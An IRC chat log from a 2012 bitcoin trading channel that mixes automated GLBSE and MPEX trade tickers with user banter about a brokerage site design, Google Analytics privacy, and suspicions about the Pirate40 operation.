[S.MPOE] 5750 @ 0.00037181 = 2.1379 BTC [-] Aug 18 02:31:34 [MPEX] [S.MPOE] 14285 @ 0.00038089 = 5.441 BTC [+] Aug 18 02:31:44 lol Aug 18 02:31:55 lol, yeah, mircea_popescu, but i'll actually get to the css Aug 18 02:32:03 [GLBSE] [YARR] 1 @ 1.00000001 BTC [+] Aug 18 02:32:04 smickles who says i won't ? :D Aug 18 02:32:09 zing Aug 18 02:32:33 there's 2020, 2050, there's years... Aug 18 02:32:40 rg: it'd be more the place of mpex brokerages to pay interest Aug 18 02:33:00 now that's a point. Aug 18 02:33:17 hush Aug 18 02:33:22 its mircea's lazyness Aug 18 02:33:26 dont condone it Aug 18 02:33:46 ynot ?! Aug 18 02:33:55 [GLBSE] [YARR] 3 @ 1.00000001 = 3 BTC [+] Aug 18 02:34:40 [GLBSE] [YARR] 3 @ 1.00000001 = 3 BTC [+] Aug 18 02:34:40 well this is gay Aug 18 02:34:45 i have a ton of litecoins to sell Aug 18 02:34:51 and i cant sell til 005 or 0045 Aug 18 02:34:56 which isnt going to happen Aug 18 02:35:05 litecoins have always been homosexual in nature Aug 18 02:35:17 i dont care Aug 18 02:35:19 it makes me money Aug 18 02:35:40 ive pulled more out of litecoin in the past 3 weeks than i have from bitvps in 4 months Aug 18 02:35:45 xD Aug 18 02:36:26 [GLBSE] [YARR] 1 @ 1.00000001 BTC [+] Aug 18 02:38:38 [GLBSE] [YARR] 17 @ 1.00000001 = 17 BTC [+] Aug 18 02:39:22 [GLBSE] [YARR] 30 @ 1.01 = 30.3 BTC [+] Aug 18 02:39:50 the project name is the best part Aug 18 02:40:05 "smex" Aug 18 02:40:53 [GLBSE] [BTCMC] 1 @ 0.5 BTC [-] Aug 18 02:40:54 [GLBSE] [BTCMC] 1 @ 0.3 BTC [-] Aug 18 02:41:00 as in 'smickes' and 'MPEx' went at it hard, and all that was left over was the smex Aug 18 02:41:13 [MPEX] [F.GIGA.ETF] 2800 @ 0.00096097 = 2.6907 BTC [+] Aug 18 02:41:15 [MPEX] [F.GIGA.ETF] 8500 @ 0.00096483 = 8.2011 BTC [+] Aug 18 02:41:16 [MPEX] [F.GIGA.ETF] 9000 @ 0.0009656 = 8.6904 BTC [+] Aug 18 02:41:17 [MPEX] [F.GIGA.ETF] 13100 @ 0.00096696 = 12.6672 BTC [+] Aug 18 02:41:18 [MPEX] [F.GIGA.ETF] 8600 @ 0.00097148 = 8.3547 BTC [+] Aug 18 02:41:44 you ever played supaplex smickles ? Aug 18 02:42:23 [MPEX] [F.GIGA.ETF] 6878 @ 0.00097148 = 6.6818 BTC [+] Aug 18 02:42:24 [MPEX] [F.GIGA.ETF] 1722 @ 0.00097408 = 1.6774 BTC [+] Aug 18 02:45:57 [GLBSE] [FPGA.CONTRACT] 6 @ 0.012 = 0.072 BTC [-] Aug 18 02:48:16 [GLBSE] [PPT.B] 30 @ 1.1 = 33 BTC [-] Aug 18 02:48:24 [GLBSE] [YARR] 14 @ 1 = 14 BTC [-] Aug 18 02:48:25 [GLBSE] [YARR] 24 @ 1 = 24 BTC [-] Aug 18 02:48:26 [GLBSE] [YARR] 3 @ 1 = 3 BTC [-] Aug 18 02:48:56 [GLBSE] [GIGAMINING] 3 @ 1 = 3 BTC [-] Aug 18 02:48:58 [GLBSE] [GIGAMINING] 5 @ 0.99 = 4.95 BTC [-] Aug 18 02:49:01 [MPEX] [S.MPOE] 20800 @ 0.0003965 = 8.2472 BTC [+] Aug 18 02:51:00 [GLBSE] [OBSI.HRPT] 20 @ 0.08 = 1.6 BTC [+] Aug 18 02:53:34 [GLBSE] [OBSI.HRPT] 35 @ 0.09 = 3.15 BTC [+] Aug 18 02:54:17 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [+] Aug 18 02:56:58 [GLBSE] [OBSI.HRPT] 25 @ 0.09 = 2.25 BTC [+] Aug 18 02:57:30 [GLBSE] [OBSI.HRPT] 10 @ 0.09 = 0.9 BTC [+] Aug 18 02:58:04 [GLBSE] [OBSI.HRPT] 1 @ 0.09 BTC [+] Aug 18 02:58:28 [GLBSE] [FUTUREFUND] 1000 @ 0.00011716 = 0.1172 BTC [+] Aug 18 03:01:22 [GLBSE] [GIPPT] 2 @ 0.961 = 1.922 BTC [+] Aug 18 03:09:14 [GLBSE] [NYAN] 16 @ 1 = 16 BTC [+] Aug 18 03:12:04 [GLBSE] [FOO.PPPPT] 1 @ 0.9 BTC [+] Aug 18 03:12:06 [GLBSE] [FOO.PPPPT] 99 @ 0.936 = 92.664 BTC [+] Aug 18 03:16:02 [GLBSE] [FOO.PPPPT] 100 @ 0.936 = 93.6 BTC [+] Aug 18 03:17:18 [MPEX] [S.MPOE] 10500 @ 0.00038792 = 4.0732 BTC [-] Aug 18 03:17:50 [GLBSE] [FOO.PPPPT] 29 @ 0.936 = 27.144 BTC [+] Aug 18 03:20:18 [GLBSE] [GIGAMINING] 9 @ 1 = 9 BTC [+] Aug 18 03:21:14 [GLBSE] [FOO.PPPPT] 232 @ 0.936 = 217.152 BTC [+] Aug 18 03:21:36 [GLBSE] [YABMC] 10 @ 0.1175 = 1.175 BTC [-] Aug 18 03:27:25 [GLBSE] [FOO.PPPPT] 1 @ 0.936 BTC [+] Aug 18 03:28:43 ppts are reasonable again? Aug 18 03:28:52 well .936 is more reasonable than .25 lol Aug 18 03:29:41 [GLBSE] [OBSI.HRPT] 1 @ 0.09 BTC [+] Aug 18 03:31:09 [GLBSE] [PPT.E] 369 @ 1.22 = 450.18 BTC [-] Aug 18 03:35:46 hmmm, mircea_popescu i think i have Aug 18 03:35:49 http://i.imgur.com/7qUXR.png Aug 18 03:36:00 how's that for a pre css screenshot Aug 18 03:36:07 not bad at all. Aug 18 03:36:19 srsly, it matters little how it looks. what matters is what it does Aug 18 03:36:24 how fast, how well, how secure. Aug 18 03:36:52 i file this part in the 'how well' Aug 18 03:37:14 remember the complaints about how your page is just a long list of jibberish to them? Aug 18 03:37:31 yea Aug 18 03:37:46 as a broker, part of the functionality is to simplify stuff Aug 18 03:38:11 notice all the btcusd options are clearly called options Aug 18 03:38:19 and they're all together Aug 18 03:38:29 you need to click that basically ? Aug 18 03:38:30 [MPEX] [S.MPOE] 1000 @ 0.00038792 = 0.3879 BTC [-] Aug 18 03:38:44 click that link and you'll get a table with rows of strikes Aug 18 03:38:50 aha Aug 18 03:39:00 so basically you added a little protection for ppl :) Aug 18 03:39:08 i'm thinking one table for Ts and another for Ns Aug 18 03:39:36 simplicity at little to no cost is Goal 1 Aug 18 03:39:56 sounds promising. Aug 18 03:40:16 i think goal 2 will be either a stoploss feature, or a 'open a position' feature Aug 18 03:40:27 course i'm the absolute worst person to talk about this with. there's prolly most benefit in doing things EXACTLY like i wouldn't do them. Aug 18 03:40:34 at least look&feel wise. Aug 18 03:40:55 a position will track p/l, greeks, and have an automagically-close-position button Aug 18 03:41:14 now this is a good ideea, esp if you can somehow cram all that in. Aug 18 03:41:32 well, i intend it to look good Aug 18 03:41:41 and it ain't going to be bootstrap Aug 18 03:41:52 what do you mean ? Aug 18 03:42:05 github.com/twitter/bootstrap Aug 18 03:42:06 o the twitter thing ? Aug 18 03:42:11 yaknow, how glbse looks Aug 18 03:42:20 lol Aug 18 03:42:27 about 50% of new sites look like that. Aug 18 03:42:31 yup Aug 18 03:42:32 wasn't bitcoinica bootstrap too ? Aug 18 03:42:35 yup Aug 18 03:42:46 gox may be to, just more modified Aug 18 03:42:50 i'll look Aug 18 03:43:12 no Aug 18 03:43:20 gox looks like html5boilerplate Aug 18 03:43:53 [GLBSE] [DMC] 3 @ 0.049 = 0.147 BTC [+] Aug 18 03:43:55 plus, i ascribe to the notion that javascript is evil Aug 18 03:44:00 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6999 = 1.3998 BTC [+] Aug 18 03:44:18 javascript is evil. Aug 18 03:44:19 and anything that i would do with javascript can probably be done with css Aug 18 03:45:04 except if i want to throw googleanalytics on it :( Aug 18 03:45:17 but that would come later, Aug 18 03:45:21 and with a disclaimer Aug 18 03:45:21 sure, give google the data on finance users for free. Aug 18 03:45:31 stupidest thing i ever heard from you. Aug 18 03:46:00 aw, too bad Aug 18 03:46:31 [GLBSE] [PPT.E] 33 @ 1.22 = 40.26 BTC [-] Aug 18 03:46:46 i'm too lazy to track the movements of the users about the site myself Aug 18 03:46:48 [GLBSE] [YABMC] 10 @ 0.1179 = 1.179 BTC [+] Aug 18 03:47:17 anyway, i wouldn't consider using GA until i was established and trying to fix 'designe flow' issues Aug 18 03:47:32 heh Aug 18 03:47:35 glbse uses GA Aug 18 03:48:01 ack, so does bitfloor Aug 18 03:48:10 i wonder how many others Aug 18 03:48:39 [MPEX] [B.MPCD.C] 1000 @ 0.0010223 = 1.0223 BTC [+] Aug 18 03:49:09 jesus that's so stupid :( Aug 18 03:49:18 [GLBSE] [FOO.PPPPT] 1 @ 0.65 BTC [-] Aug 18 03:49:32 how can people do this :( Aug 18 03:49:34 huh, now that i think about it Aug 18 03:49:53 if i were tackeling such an issue, it would be easier to do it 'in-house' Aug 18 03:50:13 [MPEX] [B.MPCD.C] 10000 @ 0.0010223 = 10.223 BTC [+] Aug 18 03:50:14 grep the log Aug 18 03:50:18 yes. Aug 18 03:50:20 for one. Aug 18 03:50:22 follow one ip Aug 18 03:50:29 for the other, how about anonimity for chrissakes! Aug 18 03:50:44 literally, make a bitcoin finance site and put ga on it ? Aug 18 03:50:45 or script them together into averages Aug 18 03:50:59 this is like going to a cancer survivor's survival party Aug 18 03:51:04 and bringing them chemo drugs. Aug 18 03:51:07 as a gift. Aug 18 03:51:20 oh my Aug 18 03:51:28 it's beyond insulting. Aug 18 03:52:22 [MPEX] [S.MPOE] 24600 @ 0.0003965 = 9.7539 BTC [+] Aug 18 03:55:09 [GLBSE] [YARR] 3 @ 0.9211 = 2.7633 BTC [-] Aug 18 03:55:10 [GLBSE] [YARR] 2 @ 0.921 = 1.842 BTC [-] Aug 18 03:55:33 whats happening now? Aug 18 03:56:34 various sites (like glbse) use google analytics Aug 18 03:58:40 Ghostery makes it go away Aug 18 03:58:48 the google analytics Aug 18 03:59:09 notscript too Aug 18 03:59:46 [GLBSE] [PPT.E] 98 @ 1.22 = 119.56 BTC [-] Aug 18 04:00:03 Ahh Aug 18 04:00:16 [GLBSE] [TYGRR.BOND-P] 4 @ 0.6301 = 2.5204 BTC [-] Aug 18 04:00:17 [GLBSE] [TYGRR.BOND-P] 6 @ 0.63 = 3.78 BTC [-] Aug 18 04:01:11 [GLBSE] [TYGRR.BOND-P] 34 @ 0.63 = 21.42 BTC [-] Aug 18 04:01:13 [GLBSE] [TYGRR.BOND-P] 10 @ 0.611 = 6.11 BTC [-] Aug 18 04:01:14 [GLBSE] [TYGRR.BOND-P] 18 @ 0.61 = 10.98 BTC [-] Aug 18 04:01:14 [GLBSE] [TYGRR.BOND-P] 8 @ 0.600001 = 4.8 BTC [-] Aug 18 04:01:16 [GLBSE] [TYGRR.BOND-P] 10 @ 0.6 = 6 BTC [-] Aug 18 04:01:17 [GLBSE] [TYGRR.BOND-P] 11 @ 0.58 = 6.38 BTC [-] Aug 18 04:01:18 [GLBSE] [TYGRR.BOND-P] 5 @ 0.56789 = 2.8395 BTC [-] Aug 18 04:01:19 [GLBSE] [TYGRR.BOND-P] 6 @ 0.561 = 3.366 BTC [-] Aug 18 04:01:20 [GLBSE] [TYGRR.BOND-P] 18 @ 0.56 = 10.08 BTC [-] Aug 18 04:01:22 [GLBSE] [TYGRR.BOND-P] 2 @ 0.55 = 1.1 BTC [-] Aug 18 04:01:23 [GLBSE] [TYGRR.BOND-P] 84 @ 0.50000001 = 42 BTC [-] Aug 18 04:01:23 [GLBSE] [TYGRR.BOND-P] 17 @ 0.5 = 8.5 BTC [-] Aug 18 04:01:24 [GLBSE] [TYGRR.BOND-P] 37 @ 0.5 = 18.5 BTC [-] Aug 18 04:02:54 [GLBSE] [TYGRR.BOND-P] 63 @ 0.5 = 31.5 BTC [-] Aug 18 04:02:58 oh yeah, mircea_popescu, about the stupid. I'm open to changing my mind based on a good argument or funny-but-true analogy Aug 18 04:03:26 hm ? Aug 18 04:04:03 for the record : ga does breach tor. https://trac.torproject.org/projects/tor/ticket/3991 Aug 18 04:04:39 really Aug 18 04:06:44 [MPEX] [F.GIGA.ETF] 386 @ 0.00097408 = 0.376 BTC [+] Aug 18 04:06:46 [MPEX] [F.GIGA.ETF] 4600 @ 0.00097857 = 4.5014 BTC [+] Aug 18 04:06:47 [MPEX] [F.GIGA.ETF] 84 @ 0.00098397 = 0.0827 BTC [+] Aug 18 04:07:19 [GLBSE] [YARR] 1 @ 0.921 BTC [-] Aug 18 04:07:21 [GLBSE] [YARR] 3 @ 0.9201 = 2.7603 BTC [-] Aug 18 04:07:22 [GLBSE] [YARR] 3 @ 0.92 = 2.76 BTC [-] Aug 18 04:08:00 ;;ticker Aug 18 04:08:00 Best bid: 11.78, Best ask: 11.78001, Bid-ask spread: 0.00001, Last trade: 11.78, 24 hour volume: 223136, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 04:09:09 [GLBSE] [YARR] 22 @ 0.92 = 20.24 BTC [-] Aug 18 04:09:11 [GLBSE] [YARR] 21 @ 0.9 = 18.9 BTC [-] Aug 18 04:09:59 well i put something in my faq on the subject Aug 18 04:10:18 maybe more people get it this way. Aug 18 04:11:23 i'll spam -otc with i Aug 18 04:11:25 *it Aug 18 04:11:40 http://polimedia.us/bitcoin/faq.html#19 Aug 18 04:11:49 everyone must know! Aug 18 04:11:59 too slo bro Aug 18 04:13:26 lol Aug 18 04:13:41 ;;ticker Aug 18 04:13:42 Best bid: 11.96981, Best ask: 11.96982, Bid-ask spread: 0.00001, Last trade: 11.96981, 24 hour volume: 223101, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 04:13:48 o back under 12 huh Aug 18 04:13:51 ;;tslb Aug 18 04:13:56 Time since last block: 15 minutes and 34 seconds Aug 18 04:15:12 bitfloor still has ~100 over 12 Aug 18 04:17:02 aite, i'm out. Aug 18 04:17:12 don't ruin btc guys! **** ENDING LOGGING AT Sat Aug 18 04:17:55 2012 **** BEGIN LOGGING AT Sat Aug 18 11:25:36 2012 Aug 18 11:26:54 [GLBSE] [GIGAMINING] 6 @ 1.0239 = 6.1434 BTC [+] Aug 18 11:29:41 [MPEX] [F.GIGA.ETF] 902 @ 0.00102893 = 0.9281 BTC [-] Aug 18 11:29:42 [MPEX] [F.GIGA.ETF] 9098 @ 0.00102395 = 9.3159 BTC [-] Aug 18 11:30:07 [GLBSE] [GIGAMINING] 5 @ 1.024 = 5.12 BTC [+] Aug 18 11:31:07 [GLBSE] [MU] 2 @ 0.497 = 0.994 BTC [+] Aug 18 11:31:52 [GLBSE] [BFLS] 11 @ 1.19 = 13.09 BTC [+] Aug 18 11:33:34 [GLBSE] [PPT.A] 1 @ 1.15 BTC [-] Aug 18 11:33:35 [GLBSE] [PPT.A] 1 @ 1.24 BTC [+] Aug 18 11:33:36 [GLBSE] [PPT.A] 10 @ 1.276 = 12.76 BTC [+] Aug 18 11:33:37 [GLBSE] [PPT.A] 8 @ 1.28 = 10.24 BTC [+] Aug 18 11:36:14 [GLBSE] [MPOE.ETF] 5 @ 1.39 = 6.95 BTC [+] Aug 18 11:36:16 [GLBSE] [MPOE.ETF] 15 @ 1.4 = 21 BTC [+] Aug 18 11:36:26 smickles it'd prolly be a good ideea if you put a pic on twitter. that egg looks bad. Aug 18 11:37:40 [MPEX] [S.MPOE] 17500 @ 0.0003965 = 6.9388 BTC [+] Aug 18 11:38:06 [MPEX] [F.GIGA.ETF] 694 @ 0.00102395 = 0.7106 BTC [-] Aug 18 11:38:07 [MPEX] [F.GIGA.ETF] 11437 @ 0.00102039 = 11.6702 BTC [-] Aug 18 11:50:41 [GLBSE] [GMVT-BOT] 5 @ 0.1 = 0.5 BTC [+] Aug 18 11:55:33 [MPEX] [S.MPOE] 34453 @ 0.0003965 = 13.6606 BTC [+] Aug 18 11:57:52 [GLBSE] [BFLS.RIG] 20 @ 0.8 = 16 BTC [-] Aug 18 11:57:53 Good morning everybody :) Aug 18 12:03:40 [GLBSE] [TYGRR.BOND-P] 7 @ 0.779 = 5.453 BTC [-] Aug 18 12:04:02 usagi: I am still awake! Aug 18 12:04:04 wtf Aug 18 12:04:07 why am I still awake Aug 18 12:06:00 ahahah. not enough porn ? Aug 18 12:06:15 OneFixt is keeping me up all night Aug 18 12:06:24 o rly ?! Aug 18 12:06:27 yeah Aug 18 12:06:31 how lol Aug 18 12:06:42 something involving a salad Aug 18 12:06:54 you suggesting he's atossin ? Aug 18 12:06:56 you know how it is Aug 18 12:07:05 [MPEX] [S.MPOE] 11600 @ 0.00039477 = 4.5793 BTC [-] Aug 18 12:09:42 [GLBSE] [TYGRR.BOND-P] 4 @ 0.5601 = 2.2404 BTC [-] Aug 18 12:09:44 [GLBSE] [TYGRR.BOND-P] 2 @ 0.56 = 1.12 BTC [-] Aug 18 12:09:45 [GLBSE] [TYGRR.BOND-P] 6 @ 0.522 = 3.132 BTC [-] Aug 18 12:09:47 [GLBSE] [TYGRR.BOND-P] 26 @ 0.50000001 = 13 BTC [-] Aug 18 12:12:27 [MPEX] [S.MPOE] 1900 @ 0.00039477 = 0.7501 BTC [-] Aug 18 12:12:29 [MPEX] [S.MPOE] 14389 @ 0.00039338 = 5.6603 BTC [-] Aug 18 12:12:30 [MPEX] [S.MPOE] 1711 @ 0.00038551 = 0.6596 BTC [-] Aug 18 12:13:07 [MPEX] [S.MPOE] 13200 @ 0.0003965 = 5.2338 BTC [+] Aug 18 12:14:14 [GLBSE] [GIGAMINING] 2 @ 1 = 2 BTC [-] Aug 18 12:19:01 [GLBSE] [YARR] 16 @ 1 = 16 BTC [+] Aug 18 12:21:05 mornin Aug 18 12:21:35 heya. Aug 18 12:21:46 [GLBSE] [NYAN.C] 3 @ 0.998 = 2.994 BTC [-] Aug 18 12:21:48 [GLBSE] [NYAN.C] 4 @ 0.9989 = 3.9956 BTC [+] Aug 18 12:22:07 [GLBSE] [FUTUREFUND] 30 @ 0.00010612 = 0.0032 BTC [-] Aug 18 12:22:37 i see btc is still left with some value Aug 18 12:22:41 :) Aug 18 12:22:47 ;;ticker Aug 18 12:22:47 Best bid: 11.92101, Best ask: 11.92102, Bid-ask spread: 0.00001, Last trade: 11.92101, 24 hour volume: 221499, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 12:22:55 anything over 10 is good Aug 18 12:22:58 if you're long term Aug 18 12:23:22 [GLBSE] [FUTUREFUND] 70 @ 0.00010611 = 0.0074 BTC [-] Aug 18 12:23:31 I'd prefer a massive drop Aug 18 12:23:44 where were you yesterday Aug 18 12:23:47 bdk_kluge bitfoo blazing bonks BTC-Mining BTCHero Aug 18 12:23:52 lol BTC-Mining wants to buy moar Aug 18 12:23:56 selling assets on GLBSE Aug 18 12:24:05 I couldn't sell in time =/ Aug 18 12:24:13 Went to work and when I was back... Aug 18 12:24:22 i sold at bunch of different prices Aug 18 12:24:26 Should have called in sick =/ Aug 18 12:24:36 some even above 13.5 even though i was late Aug 18 12:24:47 an gox was slow as a gox Aug 18 12:25:09 lol Aug 18 12:25:35 A gox? That's slow Aug 18 12:27:57 [MPEX] [S.MPOE] 38400 @ 0.0003965 = 15.2256 BTC [+] Aug 18 12:32:59 [MPEX] [S.BVPS] 350 @ 0.003801 = 1.3304 BTC [+] Aug 18 12:38:50 [GLBSE] [PUREMINING] 8 @ 0.14 = 1.12 BTC [-] Aug 18 12:43:38 [GLBSE] [PPT.B] 5 @ 1.1001 = 5.5005 BTC [-] Aug 18 12:43:40 [GLBSE] [PPT.B] 200 @ 1.1 = 220 BTC [-] Aug 18 12:44:18 [05:23:54] selling assets on GLBSE Aug 18 12:44:20 selling what? Aug 18 12:45:00 [GLBSE] [PPT.DIV] 1 @ 0.03 BTC [+] Aug 18 12:45:04 [GLBSE] [ASICMINER] 16 @ 0.1049 = 1.6784 BTC [+] Aug 18 12:45:05 [GLBSE] [ASICMINER] 35 @ 0.105 = 3.675 BTC [+] Aug 18 12:45:07 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 18 12:45:39 [GLBSE] [GMVT-BOT] 9 @ 0.091 = 0.819 BTC [-] Aug 18 12:45:40 [GLBSE] [GMVT-BOT] 81 @ 0.09 = 7.29 BTC [-] Aug 18 12:46:01 Selling assets Aug 18 12:46:07 I know that Aug 18 12:46:09 which ones Aug 18 12:46:43 The ones no longer on BTC-BOND spreadsheet: https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c#gid=0 Aug 18 12:46:54 anything on my trade list? Aug 18 12:47:10 [GLBSE] [ASICMINER] 2 @ 0.105 = 0.21 BTC [+] Aug 18 12:47:14 Don't got much left except BTC-MINING Aug 18 12:48:07 Sorry, meant to paste this link: https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Aug 18 12:48:14 The other is private eh Aug 18 12:48:15 [GLBSE] [YABMC] 81 @ 0.1245 = 10.0845 BTC [+] Aug 18 12:52:57 lol Aug 18 12:57:07 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 18 12:57:59 rrr... btc has dropped below 10 EUR :( Aug 18 12:58:17 Go go up, you little shit! UP! Aug 18 12:59:01 [MPEX] [F.GIGA.ETF] 5305 @ 0.00099523 = 5.2797 BTC [-] Aug 18 13:00:14 Who cares? Aug 18 13:00:34 If it goes up, I'm worth more. If it crash, it's an opportunity to stockpile more Aug 18 13:03:45 [MPEX] [S.MPOE] 39300 @ 0.00038999 = 15.3266 BTC [-] Aug 18 13:04:20 [MPEX] [S.MPOE] 4300 @ 0.00038695 = 1.6639 BTC [-] Aug 18 13:06:41 [GLBSE] [BITBOND] 2 @ 0.399 = 0.798 BTC [-] Aug 18 13:07:48 [GLBSE] [BITBOND] 6 @ 0.3971 = 2.3826 BTC [-] Aug 18 13:07:54 [MPEX] [S.MPOE] 2400 @ 0.00038695 = 0.9287 BTC [-] Aug 18 13:07:55 [MPEX] [S.MPOE] 500 @ 0.00039075 = 0.1954 BTC [+] Aug 18 13:07:57 [MPEX] [S.MPOE] 4600 @ 0.00039105 = 1.7988 BTC [+] Aug 18 13:07:58 [MPEX] [S.MPOE] 44400 @ 0.0003965 = 17.6046 BTC [+] Aug 18 13:15:12 [GLBSE] [GMVT-BOT] 9 @ 0.09999999 = 0.9 BTC [+] Aug 18 13:17:07 [GLBSE] [GMVT-BOT] 17 @ 0.1 = 1.7 BTC [+] Aug 18 13:22:49 Obsi: are you here? Aug 18 13:26:27 [GLBSE] [RUGATU] 2 @ 0.1 = 0.2 BTC [-] Aug 18 13:30:17 [GLBSE] [TYGRR.BOND-P] 4 @ 0.7397 = 2.9588 BTC [+] Aug 18 13:30:18 [GLBSE] [TYGRR.BOND-P] 20 @ 0.7398 = 14.796 BTC [+] Aug 18 13:35:00 [GLBSE] [TYGRR.BOND-P] 12 @ 0.75 = 9 BTC [+] Aug 18 13:37:08 [GLBSE] [TYGRR.BOND-P] 3 @ 0.75 = 2.25 BTC [+] Aug 18 13:38:51 !pl OBSI.1MHS Aug 18 13:38:51 !pl [@] [] Aug 18 13:38:59 !pl 1@OBSI.1MHS Aug 18 13:38:59 !pl [@] [] Aug 18 13:39:10 why are people selling ppts? Aug 18 13:39:16 dub: no idea Aug 18 13:39:24 [GLBSE] [TYGRR.BOND-P] 1 @ 0.75 BTC [+] Aug 18 13:39:48 Because Pirate is stopping his operation? Aug 18 13:40:08 !pl 1@OBSI.1MHS 0.25 Aug 18 13:40:08 Requesting data from GLBSE (might take a while). Aug 18 13:40:09 GLBSE 404 Aug 18 13:40:17 fuck :( Aug 18 13:40:22 and ppt operators are not going to buy them back at 1btc? Aug 18 13:40:37 dub: yes they are if money arrives from Pirate40 Aug 18 13:40:44 Says he'll return funds in about a week (Full Price). Large price drop on MtGox around the time he made the announcement... Aug 18 13:41:09 As far as I'm concerned, those invested in pirate should complain to MtGox now and not wait a week. Aug 18 13:41:22 Demand it be investigated, just in case. Aug 18 13:41:32 you think it was pirate cashing out Aug 18 13:41:56 [MPEX] [S.MPOE] 25700 @ 0.0003965 = 10.1901 BTC [+] Aug 18 13:41:59 [GLBSE] [NYAN.C] 10 @ 0.9989 = 9.989 BTC [+] Aug 18 13:42:07 Might well be. No proof, but the whole going felt like a ponzi. Aug 18 13:44:22 anyone think we'lll find out what his method was? Aug 18 13:44:25 First the guy gets a lot of ratings on small transactions... then he gets more trust from reputable member with some unkown "high yield venture"... Now after getting so much trust, I hear he opens accounts to public... then right after he close operation, huge sale on MtGox, and he says to wait a week and he'll reimburse... Aug 18 13:45:12 That's more than suspicious... Aug 18 13:45:26 of course there's other possible explanations Aug 18 13:45:51 nefario I sent a support email about hidden bids I cannot remove. Do you have time to help me now? Aug 18 13:46:37 But I'd make a request to MtGox right away and not wait a week just in case. Aug 18 13:46:48 If pirate is honest, he probably won't mind... Aug 18 13:47:03 If he isn't, that's enough time to flee away... Aug 18 13:52:23 Who cares? Aug 18 13:52:23 If it goes up, I'm worth more. If it crash, it's an opportunity to stockpile more <<< exactly. Aug 18 13:53:04 the opportunity was at 5 bucks. Aug 18 13:53:30 kakobreklaa actually i have been buying in the 2-4 range. Aug 18 13:53:36 haven't really bought much since it went 5 Aug 18 13:53:37 can any of you look at the log and send me the conversation around the line: "I managed to get out of OBSI.1MHS with" Aug 18 13:53:42 even better mp Aug 18 13:54:09 BTC-Mining if i were pirate and honest i'd mind. Aug 18 13:55:29 09:19.07 ( EskimoBob ) I managed to get out of OBSI.1MHS with a 70+% profit. Aug 18 13:55:31 [MPEX] [S.MPOE] 45800 @ 0.0003965 = 18.1597 BTC [+] Aug 18 13:55:44 ? Aug 18 13:56:07 kakobreklaa: what about before and after Aug 18 13:56:16 how much lines do you need Aug 18 13:56:24 It was mostly an anonymous operation, I don't think he would... I know I wouldn't mind people being cautious in that situation. Aug 18 13:56:51 can you paste it to me so it expires fast -+ 20 lines is probably OK ? Aug 18 13:57:49 This asshole Obsi is using this to sell his turds. He has it in his signature. Aug 18 13:58:24 EskimoBob see pm Aug 18 13:58:46 why's he an asshole ? Aug 18 13:58:57 thank you kakobreklaa Aug 18 14:00:09 [MPEX] [O.BTCUSD.C150T] 14 @ 0.05682687 = 0.7956 BTC [-] Aug 18 14:00:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.75 BTC [+] Aug 18 14:01:23 [MPEX] [B.MPCD.A] 20000 @ 0.001005 = 20.1 BTC [-] Aug 18 14:01:49 and I'm off for the day Aug 18 14:02:16 [MPEX] [S.MPOE] 27900 @ 0.0003965 = 11.0624 BTC [+] Aug 18 14:08:11 [GLBSE] [BTCMC] 12 @ 0.5499 = 6.5988 BTC [+] Aug 18 14:08:13 [GLBSE] [BTCMC] 20 @ 0.55 = 11 BTC [+] Aug 18 14:08:14 [GLBSE] [BTCMC] 5 @ 0.58 = 2.9 BTC [+] Aug 18 14:08:15 [GLBSE] [BTCMC] 1 @ 0.639 BTC [+] Aug 18 14:08:17 [GLBSE] [BTCMC] 1 @ 0.66 BTC [+] Aug 18 14:08:18 [GLBSE] [BTCMC] 1 @ 0.738 BTC [+] Aug 18 14:15:00 [MPEX] [F.GIGA.ETF] 3169 @ 0.00100826 = 3.1952 BTC [+] Aug 18 14:19:15 [GLBSE] [ASICMINER] 2 @ 0.105 = 0.21 BTC [+] Aug 18 14:20:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.71 BTC [-] Aug 18 14:20:14 [GLBSE] [BITBOND] 2 @ 0.385 = 0.77 BTC [-] Aug 18 14:22:06 [GLBSE] [MMM] 1 @ 0.33 BTC Aug 18 14:24:52 [MPEX] [F.GIGA.ETF] 5234 @ 0.00104196 = 5.4536 BTC [+] Aug 18 14:25:15 [GLBSE] [BITBOND] 6 @ 0.388 = 2.328 BTC [+] Aug 18 14:26:14 [MPEX] [S.MPOE] 6289 @ 0.00038551 = 2.4245 BTC [-] Aug 18 14:26:16 [MPEX] [S.MPOE] 61200 @ 0.00038286 = 23.431 BTC [-] Aug 18 14:26:17 [MPEX] [S.MPOE] 46600 @ 0.00038098 = 17.7537 BTC [-] Aug 18 14:26:17 [MPEX] [S.MPOE] 37000 @ 0.00037793 = 13.9834 BTC [-] Aug 18 14:26:19 [MPEX] [S.MPOE] 8367 @ 0.00037653 = 3.1504 BTC [-] Aug 18 14:26:20 [MPEX] [S.MPOE] 17004 @ 0.00037596 = 6.3928 BTC [-] Aug 18 14:26:21 [MPEX] [S.MPOE] 16400 @ 0.00037244 = 6.108 BTC [-] Aug 18 14:26:22 [MPEX] [S.MPOE] 43416 @ 0.00037146 = 16.1273 BTC [-] Aug 18 14:26:23 [MPEX] [S.MPOE] 2143 @ 0.00037144 = 0.796 BTC [-] Aug 18 14:26:24 [MPEX] [S.MPOE] 39966 @ 0.00037096 = 14.8258 BTC [-] Aug 18 14:26:25 [MPEX] [S.MPOE] 37700 @ 0.00037073 = 13.9765 BTC [-] Aug 18 14:26:26 [MPEX] [S.MPOE] 59600 @ 0.00037072 = 22.0949 BTC [-] Aug 18 14:43:11 [GLBSE] [ASICMINER] 115 @ 0.105 = 12.075 BTC [+] Aug 18 14:43:42 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 18 14:45:59 [MPEX] [S.MPOE] 1000000 @ 0.00037 = 370 BTC [-] Aug 18 14:46:48 [GLBSE] [BTC-MINING] 1 @ 0.98 BTC [-] Aug 18 14:47:55 [GLBSE] [BTC-MINING] 5 @ 0.989 = 4.945 BTC [+] 